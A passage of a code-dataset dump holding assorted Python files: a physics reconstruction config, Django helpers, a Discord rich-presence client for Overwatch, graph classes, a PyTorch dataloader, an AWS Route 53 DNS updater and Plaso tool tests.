\"--input-path\", \"./dataset/\", \n \"--output-path\", \"embeddings.csv\",\n \"--dimensions\", str(N_DIM)])\n","sub_path":"embedding_pipeline.py","file_name":"embedding_pipeline.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"55871668","text":"import time\nimport FWCore.ParameterSet.Config as cms\nfrom FWCore.ParameterSet.VarParsing import VarParsing\nfrom Configuration.AlCa.GlobalTag import GlobalTag\nfrom IOMC.RandomEngine.RandomServiceHelper import RandomNumberServiceHelper\nfrom FastTiming.RecoTreeUtils.IOFilesHelper import *\n\noptions = VarParsing('analysis')\n\noptions.register('sampleName',\n 'SingleGammaE50_noPU',\n VarParsing.multiplicity.singleton,\n VarParsing.varType.string,\n \"sample to process\")\noptions.maxEvents = -1\noptions.parseArguments()\n\n## Get I/O files from the list given the sample name\nfilesOpt = cms.PSet(\n inputFiles = cms.untracked.vstring(\"\"),\n outputFile = cms.string(\"\")\n)\n\nGetSampleFiles(options.sampleName, \"\", filesOpt)\n\n##------------------------------------------------------------------------------\n\nprocess = cms.Process(\"RecoFastTiming\")\n\n# randomness\nprocess.RandomNumberGeneratorService = cms.Service(\"RandomNumberGeneratorService\",\n VtxSmeared = cms.PSet(\n initialSeed = cms.untracked.uint32(1),#int(time.time()%100000//1)),\n engineName = cms.untracked.string('TRandom3')\n )\n)\n\nrandHelper = RandomNumberServiceHelper(process.RandomNumberGeneratorService)\nrandHelper.populate()\n\n## load the SK geometry and magnetic field config\nprocess.load('Configuration.Geometry.GeometryExtended2023SHCalNoTaperReco_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_38T_PostLS1_cff')\nprocess.load('Configuration/StandardSequences/FrontierConditions_GlobalTag_cff')\n## import standard RecoFT configurations\nprocess.load(\"IOMC.EventVertexGenerators.GhostVtxSmearedHLLHC_cfi\")\nprocess.load(\"FastTiming.RecoTreeUtils.RecoFastTiming_cff\")\n\n#process.RecoFastTiming.makeGhosts = cms.untracked.bool(True);\n\nprocess.GlobalTag = GlobalTag(process.GlobalTag, 'auto:upgradePLS3', '')\n\nprocess.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(options.maxEvents))\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = filesOpt.inputFiles)\n\nprocess.source.duplicateCheckMode = cms.untracked.string('noDuplicateCheck')\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = filesOpt.outputFile)\n\n#process.ft_path = cms.Sequence(process.VtxSmeared+process.RecoFastTiming)\nprocess.ft_path = cms.Sequence(process.RecoFastTiming)\n\nprocess.path = cms.Path(process.ft_path)\n\nprocess.schedule = cms.Schedule(process.path)#, process.FEVTDEBUGoutput_step)\n\n","sub_path":"RecoTreeUtils/test/RecoFastTiming_cfg.py","file_name":"RecoFastTiming_cfg.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"360368956","text":"import os\nimport random \nfrom .folder_profile import folder_name as profile_folder_name\nfrom .folder_post import folder_name as post_folder_name\nimport string\nfrom random import choice\n\ndef get_file_extension(filename):\n basename = os.path.basename(filename)\n base, ext = os.path.splitext(basename)\n return base, ext\n\ndef upload_image_path(instance,filename): \n new_file = random.randint(1, 39515623) \n basename, ext = get_file_extension(filename)\n filename = \"{new_file_name}{ext}\".format(new_file_name=new_file,ext=ext)\n \n if instance.__class__.__name__ == 'PostExtraImage':\n\n folder_name = post_folder_name\n return \"{folder_name}/{username}/{new_filename}/{filename}\".format(\n folder_name=folder_name, username = instance.post.user, new_filename=new_file, filename=filename\n )\n \n if instance.__class__.__name__ == \"Post\": \n folder_name = post_folder_name\n\n elif instance.__class__.__name__ == \"Profile\":\n folder_name = profile_folder_name\n \n return \"{folder_name}/{username}/{new_filename}/{filename}\".format(\n folder_name=folder_name, username = instance.user, new_filename=new_file, filename=filename\n )\n \ndef generate_slug(): \n random = string.ascii_uppercase + string.ascii_lowercase + string.digits \n return ''.join(choice(random) for _ in range(15))\n\ndef get_absolute_uri(self,post):\n request = self.context.get('request')\n attribute_url = post.image.url \n return request.build_absolute_uri(attribute_url)","sub_path":"post/utils/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"208594459","text":"from django.shortcuts import render\nfrom realtors.models import Realtor \nfrom listings.models import Listing \nfrom listings.choices import bedroom_choices, price_choices, state_choices\n# Create your views here.\ndef home(request):\n\tlistings = Listing.objects.order_by('-list_date').filter(is_published=True)[:3]\n\tcontext = {\n\t\t'listings' \t\t\t: listings,\n\t\t'state_choices'\t\t: state_choices,\n\t\t'bedroom_choices'\t: bedroom_choices,\n\t\t'price_choices' \t: price_choices,\n\t}\n\treturn render(request, 'pages/home.html',context)\n\ndef about(request):\n\trealtors = Realtor.objects.all()\n\tcontext = {\n\t\t'realtors': realtors\n\t}\n\treturn render(request, 'pages/about.html', context)","sub_path":"btre/pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"461538836","text":"class UpdateDataIntegrationModel:\n def __init__(self,\n Code: str = None,\n SourceConnectionName: str = None,\n SourceSchema: str = None,\n SourceTableName: str = None,\n SourceQuery: str = None,\n TargetConnectionName: str = None,\n TargetSchema: str = None,\n TargetTableName: str = None,\n TargetQuery: str = None,\n IsTargetTruncate: bool = None,\n IsDelta: bool = None,\n Comments: str = None,\n SourceColumns: str = None,\n TargetColumns: str = None,\n PreExecutions: str = None,\n PostExecutions: str = None,\n ):\n self.Code: str = Code\n self.SourceConnectionName: str = SourceConnectionName\n self.SourceSchema: str = SourceSchema\n self.SourceTableName: str = SourceTableName\n self.SourceQuery: str = SourceQuery\n self.TargetConnectionName: str = TargetConnectionName\n self.TargetSchema: str = TargetSchema\n self.TargetTableName: str = TargetTableName\n self.TargetQuery: str = TargetQuery\n self.IsTargetTruncate: bool = IsTargetTruncate\n self.IsDelta = IsDelta\n self.Comments: str = Comments\n self.SourceColumns: str = SourceColumns\n self.TargetColumns: str = TargetColumns\n self.PreExecutions: str = PreExecutions\n self.PostExecutions: str = PostExecutions\n","sub_path":"models/viewmodels/integration/UpdateDataIntegrationModel.py","file_name":"UpdateDataIntegrationModel.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"366726363","text":"try:\n from owrpcConfig import maps as maps\n from owrpcConfig import misc as conf\n from owrpcConfig import col as col\n from pypresence import Presence\n import time\n import sys\n from random import randint\n from datetime import datetime as dt\nexcept Exception as e:\n import sys\n print(\"You need to install all the dependencies!\")\n print(\"Head back to the repo (https://github.com/maxicc/overwatch-rpc) to learn more.\")\n sys.exit(0)\n\nrpc = Presence(conf.clientid) # Initialize the client class\nrpc.connect() # Start the handshake loop\n\nowquotes = [\"Cheers, love! The cavalry's here!\",\"¡Apagando las luces!\",\"Old soldiers are hard to kill.\",\"Clear skies, full hearts, can't lose.\",\"Initiating the hack.\",\"Your guardian angel.\",\"It's in the refrigerator.\",\"Look out world, Tracer's here!\",\"Nerf this!\",\"Fire in the hole!\",\"Die, die, die!\",\"Justice rains from above!\",\"I will be your shield!\"]\n\nclass globals():\n ingame = 0\n map = ''\n mode = ''\n\ndef buildlist(source):\n list = ''\n for x in source.keys():\n if list == '':\n list = \"'\" + x + \"'\"\n else:\n list = list + \", '\" + x + \"'\"\n return list\n\ndef buildstrings(mode,mapinfo,sr,rank):\n state = mapinfo[1] + \" on \" + mapinfo[0]\n details = \"Playing \" + maps.modes[mode][0]\n largeimg = mapinfo[2]\n largecpt = mapinfo[0]\n if mode == \"competitive\":\n smallimg = rank\n smallcpt = str(sr) + \" SR\"\n return state, details, largeimg, largecpt, smallimg, smallcpt\n else:\n return state, details, largeimg, largecpt\n\ndef clear():\n print(col.info + \"Setting your presence to In Menus...\")\n try:\n rpc.update(state=\"In Menus\",large_image=\"overwatch\",large_text=\"Overwatch\",start=int(time.time()))\n print(col.success + \"Done! Discord may take a few seconds to update.\")\n except Exception as e:\n print(col.fail + \"Failed to clear your presence!\")\n print(col.fail + \"pypresence says: \" + str(e))\n return\n return\n\ndef endgame(state):\n if globals.ingame == 0:\n print(col.fail + \"You haven't played a game recently! Setting your status to In Menus...\")\n state = \"x\"\n try:\n if state == \"w\":\n rpc.update(details=\"In Menus\",state=\"WON a game on \" + globals.map + \" in \" + globals.mode,large_image=\"overwatch\",large_text=\"Overwatch\",start=int(time.time()))\n elif state == \"l\":\n rpc.update(details=\"In Menus\",state=\"LOST a game on \" + globals.map + \" in \" + globals.mode,large_image=\"overwatch\",large_text=\"Overwatch\",start=int(time.time()))\n elif state == \"d\":\n rpc.update(details=\"In Menus\",state=\"DREW a game on \" + globals.map + \" in \" + globals.mode,large_image=\"overwatch\",large_text=\"Overwatch\",start=int(time.time()))\n else:\n rpc.update(details=\"In Menus\",large_image=\"overwatch\",large_text=\"Overwatch\",start=int(time.time()))\n print(col.success + \"Done! Discord may take a few seconds to update.\")\n return\n except Exception as e:\n print(col.fail + \"Couldn't set your presence.\")\n print(col.fail + \"pypresence says: \" + str(e))\n\ndef info():\n print(col.info + \"Overwatch RPC Client Version \" + conf.version)\n print(col.smile + \"Created by github.com/maxicc\")\n print(col.blank)\n print(col.info + \"Available commands:\")\n print(col.info + \"!help - displays this help menu, duh.\")\n print(col.info + \"!newgame - configure a new game for your presence.\")\n print(col.info + \"!menus - sets In Menus as your presence.\")\n print(col.info + \"!win, !loss, !draw - sets In Menus with the outcome of your last game.\")\n print(col.info + \"!fullclear - remove the presence from your Discord.\")\n print(col.info + \"!quit - closes the application.\")\n print(col.info + \"!iwanttospeaktothemanager - provides the GitHub Issues link.\")\n return\n\ndef fullclear():\n print(col.info + \"Fully clearing Discord presence...\")\n try:\n rpc.clear()\n print(col.success + \"Done! Discord may take a few seconds to update.\")\n except Exception as e:\n print(col.fail + \"Failed to clear your presence!\")\n print(col.fail + \"pypresence says: \" + str(e))\n return\n return\n\ndef newgame():\n fullclear()\n modes = buildlist(maps.modes)\n print(col.info + \"What gamemode are you playing?\")\n print(col.info + \"The available gamemodes are: \" + modes)\n\n badinput = 1\n while badinput == 1:\n user = input(col.ask)\n if user not in maps.modes:\n print(col.warn + \"That's not a valid mode. The valid modes are \" + modes + \".\")\n continue\n else:\n badinput = 0\n mode = user\n mapset = maps.modes[user][1]\n continue\n\n print(col.success + \"You selected \" + maps.modes[mode][0] + \".\")\n\n if mapset == 'standard':\n mapsl = buildlist(maps.standard)\n elif mapset == 'both':\n maps1 = buildlist(maps.standard)\n maps2 = buildlist(maps.arcade)\n mapsl = maps1 + \", \" + maps2\n\n print(col.info + \"What map are you playing on?\")\n print(col.info + \"The available maps are: \" + mapsl)\n\n badinput = 1\n while badinput == 1:\n user = input(col.ask)\n if mapset == 'standard':\n if user not in maps.standard:\n print(col.warn + \"That's not a valid map. Try again.\")\n continue\n else:\n badinput = 0\n map = user\n mapinfo = maps.standard[user]\n print(col.success + \"You selected map \" + maps.standard[user][0] + \".\")\n continue\n elif mapset == 'both':\n if user not in maps.standard and user not in maps.arcade:\n print(col.warn + \"That's not a valid map. Try again.\")\n continue\n elif user in maps.standard:\n badinput = 0\n map = user\n mapinfo = maps.standard[user]\n print(col.success + \"You selected map \" + maps.standard[user][0] + \".\")\n continue\n elif user in maps.arcade:\n badinput = 0\n map = user\n mapinfo = maps.arcade[user]\n print(col.success + \"You selected map \" + maps.arcade[user][0] + \" (arcade).\")\n continue\n else:\n print(col.fail + \"This shouldn't happen!\")\n sys.exit(1)\n else:\n print(col.fail + \"This shouldn't happen!\")\n sys.exit(1)\n\n if mode == \"competitive\":\n print(col.info + \"What is your skill rating (SR)?\")\n sr = input(col.ask)\n try:\n sr = int(sr)\n if sr < 1:\n sr = 1\n elif sr > 0 and sr < 1500:\n rank = \"bronze\"\n elif sr > 1499 and sr < 2000:\n rank = \"silver\"\n elif sr > 1999 and sr < 2500:\n rank = \"gold\"\n elif sr > 2499 and sr < 3000:\n rank = \"platinum\"\n elif sr > 2999 and sr < 3500:\n rank = \"diamond\"\n elif sr > 3499 and sr < 4000:\n rank = \"masters\"\n elif sr > 3999 and sr <= 5000:\n rank = \"grandmaster\"\n else:\n raise ValueError\n except Exception as e:\n print(col.fail + \"You didn't enter a valid SR!\")\n print(col.warn + \"Defaulting to BRONZE rank... since you probably belong there anyway.\")\n sr = -1\n rank = \"bronze\"\n\n strings = buildstrings(mode,mapinfo,sr,rank)\n # state, details, largeimg, largecpt, smallimg, smallcpt\n try:\n rpc.update(state=strings[0],details=strings[1],large_image=strings[2],large_text=strings[3],small_image=strings[4],small_text=strings[5],start=int(time.time()))\n print(col.success + \"Done! Discord may take a few seconds to update.\")\n globals.ingame = 1\n globals.map = mapinfo[0]\n globals.mode = maps.modes[mode][0]\n except Exception as e:\n print(col.fail + \"Couldn't set your presence.\")\n print(col.fail + \"pypresence says: \" + str(e))\n else:\n strings = buildstrings(mode,mapinfo,0,\"\")\n try:\n rpc.update(state=strings[0],details=strings[1],large_image=strings[2],large_text=strings[3],start=int(time.time()))\n print(col.success + \"Done! Discord may take a few seconds to update.\")\n globals.ingame = 1\n except Exception as e:\n print(col.fail + \"Couldn't set your presence.\")\n print(col.fail + \"pypresence says: \" + str(e))\n\nprint(col.smile + \"Overwatch RPC Client Version \" + conf.version)\nprint(col.info + \"Created by github.com/maxicc\")\nprint(col.info + \"View all available commands using !help.\")\nif dt.now().hour == 12:\n print(col.blank + \"It's high noon.\")\nelse:\n print(col.blank + owquotes[randint(0,len(owquotes))])\n\nwhile True:\n command = input(col.cmd)\n if command.endswith(\"!help\"):\n info()\n elif command.endswith(\"!set\") or command.endswith(\"!newgame\"):\n newgame()\n elif command.endswith(\"!fullclear\"):\n fullclear()\n elif command.endswith(\"!clear\") or command.endswith(\"!menus\"):\n clear()\n elif command.endswith(\"!win\") or command.endswith(\"!won\") or command.endswith(\"!victory\"):\n endgame(\"w\")\n elif command.endswith(\"!lost\") or command.endswith(\"!loss\") or command.endswith(\"!lose\") or command.endswith(\"!defeat\"):\n endgame(\"l\")\n elif command.endswith(\"!draw\") or command.endswith(\"!drew\"):\n endgame(\"d\")\n elif command.endswith(\"!quit\"):\n print(col.success + \"Quitting...\")\n sys.exit(0)\n elif command.endswith(\"!iwanttospeaktothemanager\") or command.endswith(\"!github\"):\n print(col.smile + \"Please fill out this complaints form: https://github.com/maxicc/overwatch-rpc/issues\")\n else:\n print(col.fail + \"Couldn't find that command! Try running !help to view a list of all commands.\")\n","sub_path":"owrpcMain.py","file_name":"owrpcMain.py","file_ext":"py","file_size_in_byte":10073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"511986564","text":"import pandas as pd\ntotal_data = pd.read_csv('cleansing_data.csv')\nprint(len(total_data))\n\n\nimport re\nfrom pykospacing import spacing \n# from hanspell import spell_checker\n# from soynlp.normalizer import repeat_normalize\ndef spacing_text(reviews):\n corpus = []\n for review in reviews:\n # review = re.sub(r'\\s', '', str(review)) #remove spaces\n review = spacing(str(review))\n # review = spell_checker.check(str(review))\n # review = review.checked\n # review = repeat_normalize(str(review))\n corpus.append(review)\n return corpus\n\n\ntotal_data['review'] = spacing_text(total_data['review'])\nprint(len(total_data))\ntotal_data.to_csv('spacing_data2.csv', index=False)","sub_path":"pjt2/MechineLearning/etc/etc/tpu/spacing_text.py","file_name":"spacing_text.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"415955726","text":"from threading import Timer\n\nclass MyTimer:\n\n def __init__(self):\n self._timer= None\n self._tm = None\n self._fn = None\n\n def _do_func(self):\n if self._fn:\n self._fn()\n self._do_start()\n\n def _do_start(self):\n self._timer = Timer(self._tm, self._do_func)\n self._timer.start()\n\n def start(self, tm, fn):\n self._tm = tm\n self._fn = fn\n self._do_start()\n\n def stop(self):\n try:\n self._timer.cancel()\n except:\n pass\n\ndef hello():\n from datetime import datetime\n print(\"hello world!\", datetime.now())\n\n\nif __name__ == '__main__':\n\n mt = MyTimer()\n mt.start(2, hello)\n for i in range(10):\n import time\n time.sleep(1)\n mt.stop()\n\n","sub_path":"timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"447507707","text":"from edge import Edge\n\n\nclass Vertex:\n\n def __init__(\n self,\n id,\n coordinates,\n directed=False,\n directed_index=None\n ):\n \"\"\"Creates a vertex.\n\n Arguments:\n id -- str corresponding to vertex id\n coordinates -- tuple of vertex coordinates\n edge_list -- iterable of incident vertex objects\n \"\"\"\n self.id = id\n self.coordinates = coordinates\n self.edges = [None, None, None, None, None]\n self.add_edge_to(self, 4)\n self.heuristic = 0\n self.directed = directed\n self.directed_index = directed_index\n self.directed_previous = None\n\n def add_edge(self, edge):\n self.edges.append(edge)\n\n def add_edge_to(self, vertex, index):\n \"\"\"Adds edge to the current vertex. The origin of the edge is\n automatically set to self, and only the destination vertex need be\n supplied.\n\n Arguments:\n vertex -- destination vertex in edge\n \"\"\"\n self.edges[index] = Edge(self, vertex)\n\n def edge_index_to_vertex(self, vertex):\n \"\"\"Return index of the edge at which vertex is the destination, or None\n if vertex is not in the edge list.\n\n\n Arguments:\n vertex -- vertex object.\n \"\"\"\n try:\n if self.directed and vertex == self.directed_previous:\n return self.directed_index\n for i in range(len(self.edges)):\n e = self.edges[i]\n if e is None:\n continue\n elif e.destination == vertex:\n return i\n return None\n except Exception:\n return None\n\n def get_opposite_edge(self, edge):\n opposite_vertex = edge.destination\n for e in opposite_vertex.edges:\n if e is not None and e.destination == edge.origin:\n return e\n\n return None\n\n def __str__(self):\n return (\n 'Vertex id: {}\\n\\n'\n 'Incident edges: {}'\n .format(self.id, ', '.join([\n str(e) for e in self.edges\n ]))\n )\n\n def __eq__(self, other):\n if isinstance(other, Vertex):\n return self.id == other.id\n\n if isinstance(other, PriorityQueueVertex):\n return self.id == other.vertex.id\n\n if isinstance(other, str):\n return self.id == other\n\n # handle edge case, if vertex is being compared with something else\n return NotImplemented\n\n def __ne__(self, other):\n retval = self.__eq__(other)\n if retval is NotImplemented:\n return retval\n\n return not retval\n\n def __hash__(self):\n return self.id.__hash__()\n\n\nclass PriorityQueueVertex():\n\n def __init__(self, vertex, cost, previous_vertex):\n \"\"\"Stores relevant information of vertices during path computation.\n\n Arguments:\n cost -- integer. Cumulative edge costs leading up to\n vertex.\n previous_vertex -- Vertex object. Leaves a path running back to the\n starting vertex.\n \"\"\"\n self.vertex = vertex\n self.cost = cost\n self.previous_vertex = previous_vertex\n if self.previous_vertex is not None:\n self.depth = self.previous_vertex.depth + 1\n else:\n self.depth = 0\n\n def __eq__(self, other):\n if isinstance(other, Vertex):\n return self.vertex.id == other.id\n\n if isinstance(other, PriorityQueueVertex):\n return self.vertex.id == other.vertex.id\n\n # handle edge case, if vertex is being compared with something else\n return NotImplemented\n\n def __ne__(self, other):\n retval = self.__eq__(other)\n if retval is NotImplemented:\n return retval\n\n return not retval\n\n def __lt__(self, v):\n return self.cost < v.cost\n\n def __str__(self):\n return self.vertex.id\n","sub_path":"graph/vertex.py","file_name":"vertex.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"644109196","text":"import torch\nimport numpy as np\nimport pandas as pd\nfrom torch.utils.data import Dataset, DataLoader\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom dataProcess import *\n\n\n\nclass MyDataLoader(Dataset):\n def __init__(self,df):\n self.df = df\n self.len_idx = 0\n self.id_list = []\n self.timestep_list = []\n\n #결측치 있는 행 모두 제거\n self.df = self.df.dropna(axis=0)\n\n self.id_list = self.df.index\n self.timestep_list = list(self.df.iloc[0:,-1].values)\n\n def __len__(self):\n return(len(self.df.index))\n\n def __getitem__(self,index):\n x = torch.tensor(self.df.iloc[index,0*48:7*48]).view(-1,48*7)\n y = torch.tensor(self.df.iloc[index,7*48:8*48]).view(-1,48)\n factor = getFactorTensor(self.id_list[index].tolist(),self.timestep_list[index].tolist())\n factor = factor.view(-1,125)\n\n return x, y, factor\n\n\nif __name__=='__main__':\n df_test = pd.read_csv(\"/daintlab/data/sr/testdf.csv\",index_col=0)\n \n test_dataset = MyDataLoader(df_test)\n test_loader = DataLoader(test_dataset, shuffle=False, batch_size=64, pin_memory=False)\n\n x, y, factor = next(iter(test_loader))\n\n print(\"x :\",x.shape)\n print(\"y :\",y.shape)\n print(\"factor :\",factor.shape)\n '''\n #================================================================================#\n\n df_train = pd.read_csv(\"/daintlab/data/sr/traindf.csv\",index_col=0)\n\n train_dataset = MyDataLoader(df_train)\n train_loader = DataLoader(train_dataset, shuffle=False, batch_size=64, pin_memory=False)\n\n x, y, factor = next(iter(train_loader))\n\n print(\"x :\",x.shape)\n print(\"y :\",y.shape)\n print(\"factor :\",factor.shape)\n '''","sub_path":"LSTM/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"33545921","text":"#!/usr/bin/env python\n\nimport json\n\nfrom py.core.utils import read_template, find_directory\nfrom py.core.logging import log_debug, log_info\n\n\ndef __update_route_53_records(dns_info, session):\n route53_client = session.current.client('route53')\n\n domain = dns_info['domain']\n subdomain = dns_info['subdomain']\n endpoint = dns_info['endpoint']\n\n if dns_info['update_public_zones'] == 'public':\n update_public_zones = True\n else:\n update_public_zones = False\n\n log_info(\"Searching for route 53 hosted zones by dns name '{}'\".format(domain))\n\n response = route53_client.list_hosted_zones_by_name(\n DNSName=domain\n )\n\n for hosted_zone in response['HostedZones']:\n\n hosted_zone_id = hosted_zone['Id']\n hosted_zone_name = hosted_zone['Name']\n\n # always update everything if updating public dns\n # otherwise update only private dns\n if update_public_zones is True or hosted_zone['Config']['PrivateZone'] is True:\n\n log_info(\"Searching hosted zone with id '{} and name {}'\".format(hosted_zone_id, hosted_zone_name))\n\n # skip updating zones we don't want\n if hosted_zone_name == domain:\n\n # create the final domain name to be updated\n domain_name = \"{}.{}\".format(subdomain, domain)\n\n (hosted_zone_id, found_record_set_name, found_record_set_value) = __check_dns_record_sets(\n client=route53_client,\n hosted_zone_id=hosted_zone_id,\n record_set_name=domain_name,\n endpoint=endpoint\n )\n\n if not found_record_set_name or not found_record_set_value:\n __update_dns_record_sets(\n client=route53_client,\n hosted_zone_id=hosted_zone_id,\n rs_update={\n \"domain_name\": domain_name,\n \"endpoint\": endpoint\n }\n )\n\n\ndef __update_dns_record_sets(client, hosted_zone_id, rs_update):\n endpoint = rs_update['endpoint']\n domain_name = rs_update['domain_name']\n\n change_batch = read_template(\"{}/templates/r53.changebatch.json\".format(find_directory(__file__)))\n\n changes = change_batch['Changes']\n change = changes[0]\n\n resource_rs = change['ResourceRecordSet']\n\n resource_rs['Name'] = str(resource_rs['Name']).format(domain_name=domain_name)\n resource_records = resource_rs['ResourceRecords']\n resource_rec = resource_records[0]\n resource_rec['Value'] = str(resource_rec['Value']).format(end_domain=endpoint)\n\n log_debug(\"{} request = {}\".format(\"change_batch\", json.dumps(change_batch, indent=4, sort_keys=True, default=str)))\n\n response = client.change_resource_record_sets(\n HostedZoneId=hosted_zone_id,\n ChangeBatch=change_batch\n )\n # REVIEW: Could add a waiter to hold until change is done but it happens very quickly even though\n # DNS takes a while to propegate\n log_debug(\"{} response = {}\".format(\"change_resource_record_sets\",\n json.dumps(response, indent=4, sort_keys=True, default=str)))\n\n\ndef __check_dns_record_sets(client, hosted_zone_id, record_set_name, endpoint):\n log_info(\"Searching hosted zone domain registry for references to our domain name.\")\n\n record_set_type = 'CNAME'\n\n response = client.list_resource_record_sets(\n HostedZoneId=hosted_zone_id,\n StartRecordName=record_set_name,\n StartRecordType=record_set_type,\n MaxItems='1'\n )\n\n found_record_set_name = False\n found_record_set_value = False\n\n for record_set in response['ResourceRecordSets']:\n # Find the record set type we are after\n if record_set_type == record_set['Type'] and record_set_name == record_set['Name']:\n log_info(\"Found an existing '{}' record set for domain name '{}'.\".format(record_set_type, record_set_name))\n found_record_set_name = True\n # There could be a few\n for resource_records in record_set['ResourceRecords']:\n record_value = resource_records['Value']\n log_info(\"Which has a resource record value '{}'\".format(record_value))\n # Check each one against our required url for a match\n if endpoint == record_value:\n log_info(\"Which matches our endpoint.\".format(endpoint))\n found_record_set_value = True\n\n if not found_record_set_name:\n log_info(\"Didn't find any record sets for {} which means we'll need to create one and point it to '{}'\"\n .format(record_set_name, endpoint))\n else:\n if not found_record_set_value:\n log_info(\"But it doesn't match our endpoint '{}' so it will be updated.\".format(endpoint))\n else:\n log_info(\"So no work to do.\")\n\n return hosted_zone_id, found_record_set_name, found_record_set_value\n\n\ndef update_record_sets(dns_info, session):\n __update_route_53_records(dns_info=dns_info, session=session)\n","sub_path":"aws/aws-py/py/r53/record_sets.py","file_name":"record_sets.py","file_ext":"py","file_size_in_byte":5133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"199146507","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Tests for the extraction tool object.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport argparse\nimport unittest\n\nfrom plaso.cli import extraction_tool\n\nfrom tests.cli import test_lib\n\n\nclass ExtractionToolTest(test_lib.CLIToolTestCase):\n \"\"\"Tests for the extraction tool object.\"\"\"\n\n # pylint: disable=protected-access\n\n _EXPECTED_PERFORMANCE_OPTIONS = '\\n'.join([\n 'usage: extraction_tool_test.py [--buffer_size BUFFER_SIZE]',\n ' [--queue_size QUEUE_SIZE]',\n '',\n 'Test argument parser.',\n '',\n 'optional arguments:',\n (' --buffer_size BUFFER_SIZE, --buffer-size BUFFER_SIZE, '\n '--bs BUFFER_SIZE'),\n (' The buffer size for the output (defaults to '\n '196MiB).'),\n ' --queue_size QUEUE_SIZE, --queue-size QUEUE_SIZE',\n ' The maximum number of queued items per worker',\n ' (defaults to 125000)',\n ''])\n\n # TODO: add test for _CreateProcessingConfiguration\n\n def testParsePerformanceOptions(self):\n \"\"\"Tests the _ParsePerformanceOptions function.\"\"\"\n test_tool = extraction_tool.ExtractionTool()\n\n options = test_lib.TestOptions()\n\n test_tool._ParsePerformanceOptions(options)\n\n # TODO: add test for _ParseProcessingOptions\n # TODO: add test for _PreprocessSources\n # TODO: add test for _ReadParserPresetsFromFile\n # TODO: add test for _SetExtractionParsersAndPlugins\n # TODO: add test for _SetExtractionPreferredTimeZone\n\n def testAddPerformanceOptions(self):\n \"\"\"Tests the AddPerformanceOptions function.\"\"\"\n argument_parser = argparse.ArgumentParser(\n prog='extraction_tool_test.py', description='Test argument parser.',\n add_help=False, formatter_class=test_lib.SortedArgumentsHelpFormatter)\n\n test_tool = extraction_tool.ExtractionTool()\n test_tool.AddPerformanceOptions(argument_parser)\n\n output = self._RunArgparseFormatHelp(argument_parser)\n self.assertEqual(output, self._EXPECTED_PERFORMANCE_OPTIONS)\n\n # TODO: add test for AddProcessingOptions\n\n def testListParsersAndPlugins(self):\n \"\"\"Tests the ListParsersAndPlugins function.\"\"\"\n presets_file = self._GetTestFilePath(['presets.yaml'])\n self._SkipIfPathNotExists(presets_file)\n\n output_writer = test_lib.TestOutputWriter(encoding='utf-8')\n test_tool = extraction_tool.ExtractionTool(output_writer=output_writer)\n test_tool._presets_manager.ReadFromFile(presets_file)\n\n test_tool.ListParsersAndPlugins()\n\n output = output_writer.ReadOutput()\n\n number_of_tables = 0\n lines = []\n for line in output.split('\\n'):\n line = line.strip()\n lines.append(line)\n\n if line.startswith('*****') and line.endswith('*****'):\n number_of_tables += 1\n\n self.assertIn('Parsers', lines[1])\n\n lines = frozenset(lines)\n\n self.assertEqual(number_of_tables, 10)\n\n expected_line = 'filestat : Parser for file system stat information.'\n self.assertIn(expected_line, lines)\n\n expected_line = 'bencode_utorrent : Parser for uTorrent bencoded files.'\n self.assertIn(expected_line, lines)\n\n expected_line = (\n 'msie_webcache : Parser for MSIE WebCache ESE database files.')\n self.assertIn(expected_line, lines)\n\n expected_line = 'olecf_default : Parser for a generic OLECF item.'\n self.assertIn(expected_line, lines)\n\n expected_line = 'plist_default : Parser for plist files.'\n self.assertIn(expected_line, lines)\n\n # Note that the expected line is truncated by the cell wrapping in\n # the table.\n expected_line = (\n 'chrome_27_history : Parser for Google Chrome 27 and up history SQLite')\n self.assertIn(expected_line, lines)\n\n expected_line = 'ssh : Parser for SSH syslog entries.'\n self.assertIn(expected_line, lines)\n\n expected_line = 'winreg_default : Parser for Registry data.'\n self.assertIn(expected_line, lines)\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/cli/extraction_tool.py","file_name":"extraction_tool.py","file_ext":"py","file_size_in_byte":4015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"106536580","text":"# -*- coding: utf-8 -*-\nfrom datetime import date\nfrom client.models import Client\nfrom client.forms import FormRechercheClient\n\nfrom Antares.Verrou import Verrou\n\n\ndef ajoutClient(formAjoutClient):\n\n b_sauver = False\n dj = date.today()\n\n if formAjoutClient.is_valid():\n client = formAjoutClient.save(commit=False)\n #code\n debut_code = dj.strftime(\"%Y\") + dj.strftime(\"%m\") + 